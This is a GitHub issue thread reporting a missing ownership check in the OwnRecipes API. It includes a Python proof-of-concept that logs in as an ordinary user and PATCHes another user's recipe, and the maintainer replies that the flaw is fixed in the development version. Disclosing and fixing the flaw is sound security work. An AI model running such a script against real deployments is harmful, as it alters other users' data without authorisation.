### ISSUE TITLE
API: Every user can change every recipe?

### ISSUE THREAD

**Issue by gerw** [ownrecipes/OwnRecipes#112]
I think that there is some security problem with the api. When updating a recipe, it is not checked whether the user is allowed to do so. [Of course, it is not possible with the standard web app, since it does not offer the corresponding button.]

The following python script can be used:
```python
import requests
import json
from pprint import pprint

API_URL = "http://URL/api/v1/"
LOGIN_URL = API_URL + "accounts/obtain-auth-token/"

client = requests.session()

# login_data = {"username":"admin", "password":"TopSecret"}
login_data = {"username":"user", "password":"NotSoSecret"}

# Authorize
r1 = client.post(LOGIN_URL, data=login_data)

# Save in session
content = json.loads(r1.content)
client.headers["Authorization"] = "JWT " + content["token"]

recipe = 'cookies'

# Fetch recipe
r2 = client.get(API_URL + "recipe/recipes/" + recipe)
data = json.loads(r2.content)

print("Before patch:")
pprint(data)

# Patch recipe
data['cook_time'] = 42

print("After patch:")
pprint(data)

# Publish recipe
headers = {"Content-Type": "application/json"}
r3 = client.patch(API_URL + "recipe/recipes/" + recipe + "/", headers=headers, data=json.dumps(data))

# Show response
pprint(r3)
with open("response.html", 'wb') as f: 
	f.write(r3.content)
```

What is expected:
* `admin` can change every recipe
* `user` can only change recipes created by `user`

**Comment by sepulzera** [comment]
Possibly duplicate of https://github.com/ownrecipes/OwnRecipes/issues/56.

**Comment by sepulzera** [comment]
Tested with current development version, and not replicable. The PATCH throws 403 Forbidden.

Note: Now you will have to delete the following key/values to PATCH the recipe, as they can no longer be provided by the request:
'author', 'pub_username', 'pub_date', 'update_author', 'update_username', 'update_date'.

Please let me know, if you find any more ways to update or view data for other users without permissions. For now, I will close this issue, as it seems to be solved. Thanks!

**Comment by gerw** [comment]
I see, I just used v3.2...

**Comment by sepulzera** [comment]
Nothing wrong with that. 😉
